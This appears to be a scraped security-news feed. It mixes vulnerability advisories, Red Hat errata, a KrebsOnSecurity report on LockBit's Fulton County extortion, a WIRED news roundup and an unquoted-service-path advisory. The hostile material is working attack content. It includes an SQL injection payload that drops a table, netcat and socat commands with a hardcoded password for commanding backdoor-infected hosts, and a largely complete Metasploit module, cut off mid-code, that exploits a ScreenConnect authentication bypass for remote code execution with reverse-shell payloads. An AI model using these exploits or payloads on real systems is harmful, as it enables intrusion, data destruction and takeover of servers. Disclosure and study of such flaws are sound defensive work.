FAQ Management System version 1.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: FAQ Management System - SQL Injection  
# Google Dork: N/A  
# Application: FAQ Management System  
# Date: 25.02.2024  
# Bugs: SQL Injection   
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/17175/faq-management-system-using-php-and-mysql-source-code.html  
# Version: 1.0  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A

## Vulnerability Description:

The provided code is vulnerable to SQL injection. The vulnerability arises from directly using user input ($_GET['faq']) in the SQL query without proper validation or sanitization. An attacker can manipulate the 'faq' parameter to inject malicious SQL code, leading to unintended and potentially harmful database operations.

## Proof of Concept (PoC):

An attacker can manipulate the 'faq' parameter to perform SQL injection. For example:

1. Original Request:  
http://example.com/endpoint/delete-faq.php?faq=123

2.Malicious Request (SQL Injection):  
http://example.com/endpoint/delete-faq.php?faq=123'; DROP TABLE tbl_faq; --

This would result in a query like:

DELETE FROM tbl_faq WHERE tbl_faq_id = '123'; DROP TABLE tbl_faq; --

Which can lead to the deletion of data or even the entire table.

poc foto: https://i.imgur.com/1IENYFg.png

## Vulnerable code section:  
====================================================  
endpoint/delete-faq.php

$faq = $_GET['faq'];

// ...

$query = "DELETE FROM tbl_faq WHERE tbl_faq_id = '$faq'";

FAQ Management System 1.0 SQL Injection

Backdoor.Win32.AutoSpy.10 malware suffers from a remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/b012704cad2bae6edbd23135394b9127.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.AutoSpy.10Vulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 1008. Third party adversaries who can reach an infected host can issue various commands made available by the backdoor. Command "startapp" will run programs, "msgbox" will send a popup box to message the victim. The "hangup victim" cmd will cause infinite notepad.exe processes to open on the affected machine. Other commands avail are "info tick" which returns system information, "kill" [file] etc.Family: AutoSpyType: PE32MD5: b012704cad2bae6edbd23135394b9127Vuln ID: MVID-2024-0671Disclosure: 02/24/2024Exploit/PoC:C:\sec>nc64.exe x.x.x.x 1008startapp "c:\Windows\System32\mspaint.exe"Application started...startapp "c:\Windows\System32\calc.exe"Application started...msgbox hateMessagebox shown...info tickProduct Name       :Product ID         :Product Type       :User Organization  :User Name          :System Root        :Version            :Version Number     :Sub Version Number :Computer Name      : DESKTOP-2C4IJHOTime Zone          : @tzres.dll,-112Network Logon      :beep BeepBeep send...hangup victimDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.AutoSpy.10 MVID-2024-0671 Remote Command Execution

Red Hat Security Advisory 2024-0967-03 - An update for opensc is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0967.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: opensc security updateAdvisory ID:        RHSA-2024:0967-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0967Issue date:         2024-02-26Revision:           03CVE Names:          CVE-2023-5992====================================================================Summary: An update for opensc is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The OpenSC set of libraries and utilities provides support for working with smart cards. OpenSC focuses on cards that support cryptographic operations and enables their use for authentication, mail encryption, or digital signatures.Security Fix(es):* OpenSC: Side-channel leaks while stripping encryption PKCS#1 padding (CVE-2023-5992)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5992References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2248685

Red Hat Security Advisory 2024-0967-03

Red Hat Security Advisory 2024-0966-03 - An update for opensc is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0966.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: opensc security updateAdvisory ID:        RHSA-2024:0966-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0966Issue date:         2024-02-26Revision:           03CVE Names:          CVE-2023-5992====================================================================Summary: An update for opensc is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The OpenSC set of libraries and utilities provides support for working with smart cards. OpenSC focuses on cards that support cryptographic operations and enables their use for authentication, mail encryption, or digital signatures.Security Fix(es):* OpenSC: Side-channel leaks while stripping encryption PKCS#1 padding (CVE-2023-5992)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5992References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2248685

Red Hat Security Advisory 2024-0966-03

The FBI's takedown of the LockBit ransomware group last week came as LockBit was preparing to release sensitive data stolen from government computer systems in Fulton County, Ga. But LockBit is now regrouping, and the gang says it will publish the stolen Fulton County data on March 2 unless paid a ransom. LockBit claims the cache includes documents tied to the county's ongoing criminal prosecution of former President Trump, but court watchers say teaser documents published by the crime gang suggest a total leak of the Fulton County data could put lives at risk and jeopardize a number of other criminal trials.

The FBI’s takedown of the **LockBit** ransomware group last week came as LockBit was preparing to release sensitive data stolen from government computer systems in **Fulton County, Ga**. But LockBit is now regrouping, and the gang says it will publish the stolen Fulton County data on March 2 unless paid a ransom. LockBit claims the cache includes documents tied to the county’s ongoing criminal prosecution of former **President Trump**, but court watchers say teaser documents published by the crime gang suggest a total leak of the Fulton County data could put lives at risk and jeopardize a number of other criminal trials.

A new LockBit website listing a countdown timer until the promised release of data stolen from Fulton County, Ga.

In early February, Fulton County leaders acknowledged they were responding to an intrusion that caused disruptions for its phone, email and billing systems, as well as a range of county services, including court systems.

On Feb. 13, the LockBit ransomware group posted on its victim shaming blog a new entry for Fulton County, featuring a countdown timer saying the group would publish the data on Feb. 16 unless county leaders agreed to negotiate a ransom.

“We will demonstrate how local structures negligently handled information protection,” LockBit warned. “We will reveal lists of individuals responsible for confidentiality. Documents marked as confidential will be made publicly available. We will show documents related to access to the state citizens’ personal data. We aim to give maximum publicity to this situation; the documents will be of interest to many. Conscientious residents will bring order.”

Yet on Feb. 16, the entry for Fulton County was removed from LockBit’s site without explanation. This usually only happens after the victim in question agrees to pay a ransom demand and/or enters into negotiations with their extortionists.

However, Fulton County Commission Chairman **Robb Pitts** said the board decided it “could not in good conscience use Fulton County taxpayer funds to make a payment.”

“We did not pay nor did anyone pay on our behalf,” Pitts said at an incident briefing on Feb. 20.

Just hours before that press conference, LockBit’s various websites were seized by the FBI and the U.K.’s National Crime Agency (NCA), which replaced the ransomware group’s homepage with a seizure notice and used the existing design of LockBit’s victim shaming blog to publish press releases about the law enforcement action.

The feds used the existing design on LockBit’s victim shaming website to feature press releases and free decryption tools.

Dubbed “Operation Cronos,” the effort involved the seizure of nearly three-dozen servers; the arrest of two alleged LockBit members; the release of a free LockBit decryption tool; and the freezing of more than 200 cryptocurrency accounts thought to be tied to the gang’s activities. The government says LockBit has claimed more than 2,000 victims worldwide and extorted over $120 million in payments.

**UNFOLDING DISASTER**

In a lengthy, rambling letter published on Feb. 24 and addressed to the FBI, the ransomware group’s leader **LockBitSupp** announced that their victim shaming websites were once again operational on the dark web, with fresh countdown timers for Fulton County and a half-dozen other recent victims.

“The FBI decided to hack now for one reason only, because they didn’t want to leak information fultoncountyga.gov,” LockBitSupp wrote. “The stolen documents contain a lot of interesting things and Donald Trump’s court cases that could affect the upcoming US election.”

A screen shot released by LockBit showing various Fulton County file shares that were exposed.

LockBit has already released roughly two dozen files allegedly stolen from Fulton County government systems, although none of them involve Mr. Trump’s criminal trial. But the documents do appear to include court records that are sealed and shielded from public viewing.

**George Chidi** writes _The Atlanta Objective_, a Substack publication on crime in Georgia’s capital city. Chidi says the leaked data so far includes a sealed record related to a child abuse case, and a sealed motion in the murder trial of Juwuan Gaston demanding the state turn over confidential informant identities.

Chidi cites reports from a Fulton County employee who said the confidential material includes the identities of jurors serving on the trial of the rapper Jeffery “Young Thug” Williams, who is charged along with five other defendants in a racketeering and gang conspiracy.

“The screenshots suggest that hackers will be able to give any attorney defending a criminal case in the county a starting place to argue that evidence has been tainted or witnesses intimidated, and that the release of confidential information has compromised cases,” Chidi wrote. “Judge Ural Glanville has, I am told by staff, been working feverishly behind the scenes over the last two weeks to manage the unfolding disaster.”

LockBitSupp also denied assertions made by the U.K.’s NCA that LockBit did not delete stolen data as promised when victims agreed to pay a ransom. The accusation is an explosive one because nobody will pay a ransom if they don’t believe the ransomware group will hold up its end of the bargain.

The ransomware group leader also confirmed information first reported here last week, that federal investigators managed to hack LockBit by exploiting a known vulnerability in PHP, a scripting language that is widely used in Web development.

“Due to my personal negligence and irresponsibility I relaxed and did not update PHP in time,” LockBitSupp wrote. “As a result of which access was gained to the two main servers where this version of PHP was installed.”

LockBitSupp’s FBI letter said the group kept copies of its stolen victim data on servers that did not use PHP, and that consequently it was able to retain copies of files stolen from victims. The letter also listed links to multiple new instances of LockBit dark net websites, including the leak page listing Fulton County’s new countdown timer.

LockBit’s new data leak site promises to release stolen Fulton County data on March 2, 2024, unless paid a ransom demand.

“Even after the FBI hack, the stolen data will be published on the blog, there is no chance of destroying the stolen data without payment,” LockBitSupp wrote. “All FBI actions are aimed at destroying the reputation of my affiliate program, my demoralization, they want me to leave and quit my job, they want to scare me because they can not find and eliminate me, I can not be stopped, you can not even hope, as long as I am alive I will continue to do pentest with postpaid.”

**DOX DODGING**

In January 2024, LockBitSupp told XSS forum members he was disappointed the FBI hadn’t offered a reward for his doxing and/or arrest, and that in response he was placing a bounty on his own head — offering $10 million to anyone who could discover his real name.

After the NCA and FBI seized LockBit’s site, the group’s homepage was retrofitted with a blog entry titled, “Who is LockBitSupp? The $10M question.” The teaser made use of LockBit’s own countdown timer, and suggested the real identity of LockBitSupp would soon be revealed.

However, after the countdown timer expired the page was replaced with a taunting message from the feds, but it included no new information about LockBitSupp’s identity.

On Feb. 21, the U.S. Department of State announced rewards totaling up to $15 million for information leading to the arrest and/or conviction of anyone participating in LockBit ransomware attacks. The State Department said $10 million of that is for information on LockBit’s leaders, and up to $5 million is offered for information on affiliates.

In an interview with the malware-focused Twitter/X account **Vx-Underground**, LockBit staff asserted that authorities had arrested a couple of small-time players in their operation, and that investigators still do not know the real-life identities of the core LockBit members, or that of their leader.

“They assert the FBI / NCA UK / EUROPOL do not know their information,” Vx-Underground wrote. “They state they are willing to double the bounty of $10,000,000. They state they will place a $20,000,000 bounty of their own head if anyone can dox them.”

**TROUBLE ON THE HOMEFRONT?**

In the weeks leading up to the FBI/NCA takedown, LockBitSupp became embroiled in a number of high-profile personal and business disputes on the Russian cybercrime forums.

Earlier this year, someone used LockBit ransomware to infect the networks of **AN-Security**, a venerated 30-year-old security and technology company based in St. Petersburg, Russia. This violated the golden rule for cybercriminals based in Russia and former soviet nations that make up the Commonwealth of Independent States, which is that attacking your own citizens in those countries is the surest way to get arrested and prosecuted by local authorities.

LockBitSupp later claimed the attacker had used a publicly leaked, older version of LockBit to compromise systems at AN-Security, and said the attack was an attempt to smear their reputation by a rival ransomware group known as “Clop.” But the incident no doubt prompted closer inspection of LockBitSupp’s activities by Russian authorities.

Then in early February, the administrator of the Russian-language cybercrime forum XSS said LockBitSupp had threatened to have him killed after the ransomware group leader was banned by the community. LockBitSupp was excommunicated from XSS after he refused to pay an arbitration amount ordered by the forum administrator. That dispute related to a complaint from another forum member who said LockBitSupp recently stiffed him on his promised share of an unusually large ransomware payout.

A posted by the XSS administrator saying LockBitSupp wanted him dead.

**INTERVIEW WITH LOCKBITSUPP**

KrebsOnSecurity sought comment from LockBitSupp at the ToX instant messenger ID listed in his letter to the FBI. LockBitSupp declined to elaborate on the unreleased documents from Fulton County, saying the files will be available for everyone to see in a few days.

LockBitSupp said his team was still negotiating with Fulton County when the FBI seized their servers, which is why the county has been granted a time extension. He also denied threatening to kill the XSS administrator.

“I have not threatened to kill the XSS administrator, he is blatantly lying, this is to cause self-pity and damage my reputation,” LockBitSupp told KrebsOnSecurity. “It is not necessary to kill him to punish him, there are more humane methods and he knows what they are.”

Asked why he was so certain the FBI doesn’t know his real-life identity, LockBitSupp was more precise.

“I’m not sure the FBI doesn’t know who I am,” he said. “I just believe they will never find me.”

It seems unlikely that the FBI’s seizure of LockBit’s infrastructure was somehow an effort to stave off the disclosure of Fulton County’s data, as LockBitSupp maintains. For one thing, Europol said the takedown was the result of a months-long infiltration of the ransomware group.

Also, in reporting on the attack’s disruption to the office of **Fulton County District Attorney Fani Willis** on Feb. 14, CNN reported that by then the intrusion by LockBit had persisted for nearly two and a half weeks.

Finally, if the NCA and FBI really believed that LockBit never deleted victim data, they had to assume LockBit would still have at least one copy of all their stolen data hidden somewhere safe.

Fulton County is still trying to recover systems and restore services affected by the ransomware attack. “Fulton County continues to make substantial progress in restoring its systems following the recent ransomware incident resulting in service outages,” reads the latest statement from the county on Feb. 22. “Since the start of this incident, our team has been working tirelessly to bring services back up.”

FBI’s LockBit Takedown Postponed a Ticking Time Bomb in Fulton County, Ga.

LockBitSupp, the individual(s) behind the persona representing the LockBit ransomware service on cybercrime forums such as Exploit and XSS, "has engaged with law enforcement," authorities said.
The development comes following the takedown of the prolific ransomware-as-a-service (RaaS) operation as part of a coordinated international operation codenamed Cronos. Over 14,000 rogue

Authorities Claim LockBit Admin "LockBitSupp" Has Engaged with Law Enforcement

Plus: Scammers try to dupe Apple with 5,000 fake iPhones, Avast gets fined for selling browsing data, and researchers figure out how to clone fingerprints from your phone screen.

Today marks two years since Russia launched its full-scale invasion of Ukraine. This week, we detailed the growing crisis in Eastern Ukraine, which is now littered with deadly mines. As it fights back the invading Russian forces, Ukraine’s government is working to develop new mine-clearing technology that could help save lives around the globe.

A leaked document obtained by WIRED has revealed the secret placement of gunshot-detection sensors in locations around the United States and its territories. According to the document, which ShotSpotter's parent company authenticated, the sensors, which are used by police departments in dozens of metropolitan areas in the United States, are largely located in low-income and minority communities, according to WIRED’s analysis, adding crucial context in a long-running debate over police use of the technology.

Speaking of leaks, WIRED this week obtained 15 years of messages posted to an internal system used by members of the US Congress. The House Intelligence Committee used the “Dear Colleagues” system to warn lawmakers of an “urgent matter”—something that has not happened since at least 2009. That urgent matter, which was quickly leaked to the press, turned out to be related to Russian military research of space-based weapons. But some sources say the matter wasn’t urgent at all, and the warning was instead an attempt by House Intelligence leadership to derail a vote on privacy reforms to a major US surveillance program.

On Tuesday, a coalition of law enforcement agencies led by the UK’s National Crime Agency disrupted the LockBit ransomware gang’s operation, seizing its infrastructure, dark-web leak site, and code used to carry out its attacks against thousands of institutions globally. Although ransomware attacks resulted in a record $1.1 billion in ransom payments last year, Anne Neuberger, a top US cyber official in the Biden administration, tells WIRED how the 2021 ransomware attack on Colonial Pipeline has transformed the ways American institutions defend against and respond to such attacks.

In dual wins for privacy this week, the Signal Foundation began its rollout of usernames for its popular end-to-end encrypted messaging app. The update will allow people to connect without having to reveal their phone numbers. Meanwhile, Apple began to future-proof its encryption for iMessage with the launch of PQ3, a next-generation encryption protocol designed to resist decryption from quantum computers.

And there’s more. Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

Hundreds of documents linked to a Chinese hacking-for-hire firm were dumped online this week. The files belong to i-Soon, a Shanghai-based company, and give a rare glimpse into the secretive world of the industry that supports China’s state-backed hacking. The leak includes details of Chinese hacking operations, lists of victims and potential targets, and the day-to-day complaints of i-Soon staff.

“These leaked documents support TeamT5’s long-standing analysis: China's private cybersecurity sector is pivotal in supporting China’s APT attacks globally,” Che Chang, a cyber threat analyst at the Taiwan-based cybersecurity firm TeamT5, tells WIRED. Chang says the company has been tracking i-Soon since 2020 and found that it has a close relationship with Chengdu 404, a company linked to China’s state-backed hackers.

While the documents have now been removed from GitHub, where they were first posted, the identity and motivations of the person, or people, who leaked them remains a mystery. However, Chang says the documents appear to be real, a fact confirmed by two employees working for i-Soon, according to the Associated Press, which reported that the company and police in China are investigating the leak.

“There are around eight categories of the leaked files. We can see how i-Soon engaged with China's national security authorities, the details of i-Soon’s products and financial problems,” Chang says. “More importantly, we spotted documents detailing how i-Soon supported the development of the notorious remote access Trojan (RAT), ShadowPad,” Chang adds. The ShadowPad malware has been used by Chinese hacking groups since at least 2017.

Since the files were first published, security researchers have been poring over their contents and analyzing the documentation. Included were references to software to run disinformation campaigns on X, details of efforts to access communications data across Asia, and targets within governments in the United Kingdom, India, and elsewhere, according to reports by the _New York Times_ and the _The Washington Post_. The documents also reveal how i-Soon worked for China’s Ministry of State Security and the People’s Liberation Army.

According to researchers at SentinelOne, the files also include pictures of “custom hardware snooping devices,” such as a power bank that could help steal data and the company’s marketing materials. “In a bid to get work in Xinjiang–where China subjects millions of Ugyhurs to what the UN Human Rights Council has called genocide–the company bragged about past counterterrorism work,” the researchers write. “The company listed other terrorism-related targets the company had hacked previously as evidence of their ability to perform these tasks, including targeting counterterrorism centers in Pakistan and Afghanistan.”

The Federal Trade Commission has fined antivirus firm Avast $16.5 for collecting and selling people’s web browsing data through its browser extensions and security software. This included the details of web searches and the sites people visited, which, according to the FTC, revealed people’s “religious beliefs, health concerns, political leanings, location, financial status, visits to child-directed content and other sensitive information.” The company sold the data through its subsidiary Jumpshot, the FTC said in an order announcing the fine.

The ban also places five obligations on Avast: not to sell or license browsing data for advertising purposes; to obtain consent if it is selling data from non-Avast products; delete information it transferred to Jumpshot and any algorithms created from the data; tell customers about the data it sold; and introduce a new privacy program to address the problems the FTC found. An Avast spokesperson said that while they “disagree with the FTC’s allegations and characterization of the facts,” they are “pleased to resolve this matter.”

Two Chinese nationals living in Maryland—Haotian Sun and Pengfei Xue—have been convicted of mail fraud and a conspiracy to commit mail fraud for a scheme that involved sending 5,000 counterfeit iPhones to Apple. The pair, who could each face up to 20 years in prison, according to the The Register, hoped Apple would send them real phones in return. The fake phones had “spoofed serial numbers and/or IMEI numbers” to trick Apple stores or authorized service providers into thinking they were genuine. The scam took place between May 2017 and September 2019 and would have cost Apple more than $3 million in losses, a US Department of Justice press release says.

Security researchers from the US and China have created a new side-channel attack that can reconstruct people’s fingerprints from the sounds they create as you swipe them across your phone screen. The researchers used built-in microphones in devices to capture the “faint friction sounds” made by a finger and then used these sounds to create fingerprints. “The attack scenario of PrintListener is extensive and covert,” the researchers write in a paper detailing their work. “It can attack up to 27.9 percent of partial fingerprints and 9.3 percent of complete fingerprints within five attempts.” The research raises concerns about real-world hackers who are attempting to steal people’s biometrics to access bank accounts.

A Mysterious Leak Exposed Chinese Hacking Secrets

Tosibox Key Service versions 3.3.0 and below suffer from an unquoted search path issue impacting the service Tosibox Key Service for Windows. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system.

  
Tosibox Key Service 3.3.0 Local Privilege Escalation

Vendor: Tosibox Oy  
Product web page: https://www.tosibox.com  
Affected version: <=3.3.0

Summary: TOSIBOX® SoftKey is a  software that enables a secure connection  
between your computer and one or more TOSIBOX® Nodes, giving you full  
visibility and control over the network devices connected to the Node.

Desc: The application suffers from an unquoted search path issue impacting  
the service 'Tosibox Key Service' for Windows deployed as part of Tosibox  
software application. This could potentially allow an authorized but non-privileged  
local user to execute arbitrary code with elevated privileges on the system.  
A successful attempt would require the local user to be able to insert their  
code in the system root path undetected by the OS or other security applications  
where it could potentially be executed during application startup or reboot.  
If successful, the local user's code would execute with the elevated privileges  
of the application.

Tested on: Windows 10 Home 64 bit (build 9200)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5812  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5812.php

30.01.2024

--

C:\Users\ews>sc qc "Tosibox Key Service"  
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Tosibox Key Service  
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)  
        START_TYPE         : 2   AUTO_START  
        ERROR_CONTROL      : 1   NORMAL  
        BINARY_PATH_NAME   : C:\Program Files (x86)\Tosibox\bin\TosiboxKeyService.exe  
        LOAD_ORDER_GROUP   :  
        TAG                : 0  
        DISPLAY_NAME       : Tosibox Key Service  
        DEPENDENCIES       :  
        SERVICE_START_NAME : LocalSystem

C:\Users\ews>

Tosibox Key Service 3.3.0 Local Privilege Escalation / Unquoted Service Path

Backdoor.Win32.Armageddon.r malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/68d135936512e88cc0704b90bb3839e0.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Armageddon.rVulnerability: Hardcoded Cleartext CredentialsDescription: The malware listens on TCP port 5859 and requires authentication. The password "KOrUPtIzEre" is stored in cleartext within the PE file at offset 0x4635f. Connecting to the backdoor returns the value "1" then enter the password.Family: ArmageddonType: PE32 MD5: 68d135936512e88cc0704b90bb3839e0Vuln ID: MVID-2024-0670Dropped files: IP-logs.txtDisclosure: 02/22/2024Exploit/PoC:root@kali:/home/kali# socat - TCP4:x.x.x.x:58591  KOrUPtIzEre1  DESKTOP-2C4IJHO  VICTIM   WedDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Armageddon.r MVID-2024-0670 Hardcoded Credential

This Metasploit module exploits an authentication bypass vulnerability that allows an unauthenticated attacker to create a new administrator user account on a vulnerable ConnectWise ScreenConnect server. The attacker can leverage this to achieve remote code execution by uploading a malicious extension module. All versions of ScreenConnect version 23.9.7 and below are affected.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'ConnectWise ScreenConnect Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits an authentication bypass vulnerability that allows an unauthenticated attacker to create          a new administrator user account on a vulnerable ConnectWise ScreenConnect server. The attacker can leverage          this to achieve RCE by uploading a malicious extension module. All versions of ScreenConnect version 23.9.7          and below are affected.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # MSF RCE Exploit          'WatchTowr', # Auth Bypass PoC        ],        'References' => [          ['CVE', '2024-1708'], # Path traversal when extracting zip file.          ['CVE', '2024-1709'], # Auth bypass to create admin account.          ['URL', 'https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8'], # Vendor Advisory          ['URL', 'https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/'], #  Auth Bypass PoC          ['URL', 'https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass'] #  Analysis of both CVEs        ],        'DisclosureDate' => '2024-02-19',        'Platform' => %w[win linux unix],        'Arch' => [ARCH_X64, ARCH_CMD],        'Privileged' => true, # 'NT AUTHORITY\SYSTEM' on Windows, root on Linux.        'Targets' => [          [            # Tested ScreenConnect 23.9.7.8804 on Server 2022 with payloads:            # windows/x64/meterpreter/reverse_tcp            'Windows In-Memory', {              'Platform' => 'win',              'Arch' => ARCH_X64            }          ],          [            # Tested ScreenConnect 23.9.7.8804 on Server 2022 with payloads:            # cmd/windows/http/x64/meterpreter/reverse_tcp            'Windows Command', {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'DefaultOptions' => {                'FETCH_COMMAND' => 'CURL',                'FETCH_WRITABLE_DIR' => '%TEMP%'              }            }          ],          [            # Tested ScreenConnect 20.3.31734 on Ubuntu 18.04.6 with payloads:            # cmd/linux/http/x64/meterpreter/reverse_tcp            # cmd/unix/reverse_bash            'Linux Command', {              'Platform' => %w[linux unix],              'Arch' => ARCH_CMD,              'DefaultOptions' => {                'FETCH_COMMAND' => 'WGET',                'FETCH_WRITABLE_DIR' => '/tmp'              }            }          ]        ],        'DefaultOptions' => {          'RPORT' => 8040,          'SSL' => false,          'EXITFUNC' => 'thread'        },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            IOC_IN_LOGS,            CONFIG_CHANGES,            # The existing administrator account will be replaced            ACCOUNT_LOCKOUTS          ]        }      )    )    register_options([      OptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alpha_lower(8)]),      OptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(16)])    ])  end  def check    # This is a file found on the recent 23.9.7.8804 (Circa 2024), an out of support 20.3.31734 (Circa 2021), and    # a very old 2.5.3409.4645 (Circa 2012). So we can expect this file to exist on all targets. As this endpoint    # expects authentication, the response will be a 302 redirect to the Login page. As Windows is case insensitive    # we can request 'Host.aspx' with any case and get the expected 302 response, however Linux is case sensitive and    # will always 404 a request to 'Host.aspx' if we jumble up the case. Both a 302 and 404 response will still include    # the Server header, which we use to confirm both ScreenConnect and the version number.    host_aspx = 'Host.aspx'    host_aspx = loop do      jumblecase_host_aspx = host_aspx.chars.map { |c| rand(2) == 0 ? c.upcase : c.downcase }.join      break jumblecase_host_aspx unless jumblecase_host_aspx == host_aspx    end    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, host_aspx)    )    return CheckCode::Unknown('Connection failed') unless res    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 302 || res.code == 404    platform = res.code == 302 ? 'Windows' : 'Linux'    if res.headers.key?('Server') && (res.headers['Server'] =~ %r{ScreenConnect/(\d+\.\d+.\d+)})      detected = "ConnectWise ScreenConnect #{Regexp.last_match(1)} running on #{platform}."      if Rex::Version.new(Regexp.last_match(1)) <= Rex::Version.new('23.9.7')        return CheckCode::Appears(detected)      end      return CheckCode::Safe(detected)    end    CheckCode::Unknown  end  def exploit    # Sanity check the USERNAME and PASSWORD will meet the servers password requirements.    fail_with(Failure::BadConfig, 'USERNAME must not be empty.') if datastore['USERNAME'].empty?    fail_with(Failure::BadConfig, 'PASSWORD must be 8 characters of more.') if datastore['PASSWORD'].length < 8    #    # 1. Begin the setup wizard using the vulnerability to access the SetupWizard.aspx page.    #    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/')    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply when initiating setup wizard.')    end    viewstate, viewstategen = get_viewstate(res)    unless viewstate && viewstategen      fail_with(Failure::UnexpectedReply, 'Did not locate the view state after initiating setup wizard.')    end    #    # 2. Advance to the next step in the setup.    #    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),      'vars_post' => {        '__EVENTTARGET' => '',        '__EVENTARGUMENT' => '',        '__VIEWSTATE' => viewstate,        '__VIEWSTATEGENERATOR' => viewstategen,        'ctl00$Main$wizard$StartNavigationTemplateContainerID$StartNextButton' => 'Next'      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply from first step in setup wizard.')    end    viewstate, viewstategen = get_viewstate(res)    unless viewstate && viewstategen      fail_with(Failure::UnexpectedReply, 'Did not locate the view after first step in setup wizard.')    end    #    # 3. Create a new administrator account.    #    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),      'vars_post' => {        '__EVENTTARGET' => '',        '__EVENTARGUMENT' => '',        '__VIEWSTATE' => viewstate,        